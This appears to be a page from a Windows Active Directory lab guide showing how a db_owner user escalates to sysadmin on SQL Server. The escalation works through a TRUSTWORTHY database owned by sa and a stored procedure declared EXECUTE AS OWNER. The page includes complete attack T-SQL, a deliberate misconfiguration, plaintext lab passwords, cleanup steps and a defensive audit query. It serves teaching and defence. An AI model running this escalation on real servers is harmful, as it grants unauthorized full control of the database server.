# DB-Owner

## Configuring

### Prerequisite

{% content-ref url="/pages/qB32tCgObrEYZKLqTafy" %}
[Normal domain user access](/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/sql-server-attacks/initial-access/normal-domain-user-access.md)
{% endcontent-ref %}

### Configuring

1. Login to `WEB01` as the `Administrator` user with password `Welcome01!`.
2. Open "Microsoft SQL Server Management Studio"

<div align="left"><img src="/files/2OxkNPYtE3j53sgWkgTm" alt=""></div>

3\. Log in as the `sa` user with the password `sa` or `Password1!` (depending on whether you changed it for another vulnerability).

<div align="left"><img src="/files/PA13dpgTiz4xs5xO4YZv" alt=""></div>

4\. Click the “New Query” button and run the SQL query below to make `AMSTERDAM\Richard` a database owner (member of the `db_owner` role) of the `Production` database.

<div align="left"><img src="/files/Ac5O5aalWsC95DTsTPkK" alt=""></div>

```
USE Production;
-- Add the domain user to the db_owner fixed database role of Production
EXEC sp_addrolemember [db_owner], [AMSTERDAM\Richard];
```

5\. Change the owner of the database to the `sa` account: right-click "Production", click "Properties" and open the "Files" tab. Click the "..." button next to "Owner", fill in "sa" and click "OK".

<div align="left"><img src="/files/2KVwYRSacfT6U8Rw5xnV" alt=""></div>

6\. Run the following queries to confirm that `AMSTERDAM\Richard` is a member of `db_owner` and that the actual owner of the database is `sa`:

```
USE Production;
-- Role memberships in the current database (expect AMSTERDAM\Richard under db_owner)
select rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id);

-- Login that owns the Production database (expect sa)
SELECT suser_sname(owner_sid) FROM sys.databases WHERE name = 'Production';
```

<div align="left"><img src="/files/yGRrAysgh5v6tVxZCBrK" alt=""></div>

<div align="left"><img src="/files/hviQNLFdMXGBEM3UhbaY" alt=""></div>

7\. Set the database as trustworthy and verify the setting:

```
-- The lab database is Production; using another name here would leave Production unchanged
ALTER DATABASE Production SET TRUSTWORTHY ON;
```

<div align="left"><img src="/files/udrxlxRLXQMVaBuBMSZn" alt=""></div>

```
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;
```

<div align="left"><img src="/files/VgWPLy0DJJ4AmA8FBgxJ" alt=""></div>

The `1` after `Production` shows that the database is `TRUSTWORTHY`.

## Attacking

### How it works

If the database is set as trustworthy and we have db\_owner privileges, we can elevate our privileges and execute queries as `sa`. As db\_owner we can create a stored procedure `WITH EXECUTE AS OWNER`, which runs as the database owner; because the owner is `sa` (a sysadmin) and the database is `TRUSTWORTHY`, SQL Server honours that impersonation at server level, so the procedure can add our own login to the `sysadmin` role.

### Tools

* [HeidiSql](https://www.heidisql.com/)

### Executing attack

1. Login to `WS01` as Richard with the password `Sample123`.
2. Download and start HeidiSQL.
3. Click on "New" on the left bottom and configure the following settings:

* Network Type: `Microsoft SQL Server (TCP/IP)`
* Library: `SQLOLEDB`
* Hostname / IP: `WEB01.amsterdam.bank.local`
* Select: "Use Windows Authentication"
* Port: `1433`

![](/files/nlD2RN0mEAhgqDmwWGBQ)

4\. Click "OK" on the security issue warning.

#### Prerequisites

5\. Click the "Query" tab and run the following query to check whether we are a member of `db_owner`:

```
USE Production;
-- Role memberships in the Production database
select rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id);
```

<div align="left"><img src="/files/ux7jPZmarrt7SNlrEdU3" alt=""></div>

Our current user `AMSTERDAM\richard` is a member of db\_owner.

6\. Check who owns the database:

```
SELECT suser_sname(owner_sid), * FROM sys.databases
```

<div align="left"><img src="/files/nyItiPNZ5oe4uaGgnnz4" alt=""></div>

`sa` is the owner of the `production` database.

7\. Check whether the database is set to trustworthy:

```
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;
```

<div align="left"><img src="/files/DGaOnKfv3yrUNevvNPQq" alt=""></div>

The `Production` database is trustworthy.

#### Executing the attack

8\. Create a stored procedure that adds `AMSTERDAM\Richard` to the `sysadmin` server role. Because it is declared `WITH EXECUTE AS OWNER`, it runs as the database owner, `sa`:

```
USE Production;
-- Runs as the database owner (sa); trusted server-wide because TRUSTWORTHY is ON
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'AMSTERDAM\Richard','sysadmin'
```

![](/files/n1Eys7z3ais9L29CCsEl)

9\. Execute the stored procedure:

```
USE Production;
EXEC sp_elevate_me
```

<div align="left"><img src="/files/0uENZSo6kN8Pv06Qr6P2" alt=""></div>

10\. Check whether we are sysadmin:

```
SELECT is_srvrolemember('sysadmin')
```

<div align="left"><img src="/files/SnAUmHpMIx989pp4wiv4" alt=""></div>

The `1` means that we are sysadmin! See the Executing Commands page under SQL Server Attacks for how to run cmd commands:

{% content-ref url="/pages/8Jb6EIbewuWtB6niRRoj" %}
[Executing Commands](/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/sql-server-attacks/executing-commands.md)
{% endcontent-ref %}

#### Cleanup

1. Log in to `WEB01` as `Administrator`, start "Microsoft SQL Server Management Studio" and log in as Administrator.
2. Execute the following query:

```
-- Remove the server role membership gained through the attack
EXEC sp_dropsrvrolemember 'AMSTERDAM\Richard','sysadmin';
-- The procedure was created in the Production database
USE Production;
DROP PROCEDURE sp_elevate_me;
```

## Defending

### Recommendations

### Detection
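An added example covering both Recommendations and Detection, not part of the original lab page: a T-SQL audit a DBA can run to find the combination this page exploits (TRUSTWORTHY ON plus a sysadmin owner) together with the non-sysadmin `db_owner` members able to use it, followed by the remediation statements for the lab's `Production` database. It assumes a SQL Server 2012+ instance, a DBA login with VIEW ANY DEFINITION, and that database user names match their login names (true for Windows logins such as `AMSTERDAM\Richard`); `low_privileged_login` is a placeholder.

```sql
-- Added audit example (not from the original page). Run as a DBA, not as the lab user.

-- 1. Databases with TRUSTWORTHY ON whose owner is a sysadmin: the risky combination,
--    because EXECUTE AS OWNER in such a database yields sysadmin rights server-wide.
SELECT d.name                    AS database_name,
       SUSER_SNAME(d.owner_sid)  AS owner_login,
       d.is_trustworthy_on
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) = 1
  AND d.name <> 'msdb';   -- msdb is TRUSTWORTHY by design

-- 2. For each such database, list db_owner members that are NOT already sysadmin.
--    Assumes database user names equal login names (holds for Windows logins).
DECLARE @sql nvarchar(max) = N'';
SELECT @sql += N'
SELECT ' + QUOTENAME(d.name, '''') + N' AS database_name, dp.name AS db_owner_member
FROM ' + QUOTENAME(d.name) + N'.sys.database_role_members AS drm
JOIN ' + QUOTENAME(d.name) + N'.sys.database_principals AS rp ON rp.principal_id = drm.role_principal_id
JOIN ' + QUOTENAME(d.name) + N'.sys.database_principals AS dp ON dp.principal_id = drm.member_principal_id
WHERE rp.name = N''db_owner''
  AND ISNULL(IS_SRVROLEMEMBER(''sysadmin'', dp.name), 0) = 0;'
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) = 1
  AND d.name <> 'msdb';
EXEC sp_executesql @sql;   -- no-op when nothing matched

-- 3. Remediation for the lab database; either statement closes the path.
--    Uncomment to apply. [low_privileged_login] is a placeholder login without sysadmin.
-- ALTER DATABASE Production SET TRUSTWORTHY OFF;
-- ALTER AUTHORIZATION ON DATABASE::Production TO [low_privileged_login];
```

In the lab, part 1 returns `Production` owned by `sa` and part 2 returns `AMSTERDAM\Richard`; after either remediation statement, part 1 returns no rows for `Production`.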

## References

{% embed url="https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases" %}
